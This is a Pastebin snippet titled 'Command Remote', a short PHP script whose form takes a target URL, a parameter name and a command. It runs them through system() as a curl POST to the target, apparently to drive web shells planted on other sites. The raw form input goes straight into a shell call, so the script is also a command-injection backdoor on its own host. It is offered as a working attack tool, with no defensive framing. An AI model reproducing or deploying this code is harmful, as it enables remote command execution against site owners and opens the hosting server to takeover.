VanGans

Command Remote

Feb 11th, 2019
220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.27 KB | None | 0 0
  1. <?php
  2. echo "<form method=post>URL : <input name=target><br>POST NAME : <input name=anu><br>COMMAND : <input name=cmd><br><input type=submit value=RUN name=van></form><br><br>";
  3. if($_POST["van"]){
  4. echo system('curl -d '.$_POST["anu"].'="'.$_POST["cmd"].'" '.$_POST["target"]);}
Advertisement
Add Comment
Please, Sign In to add comment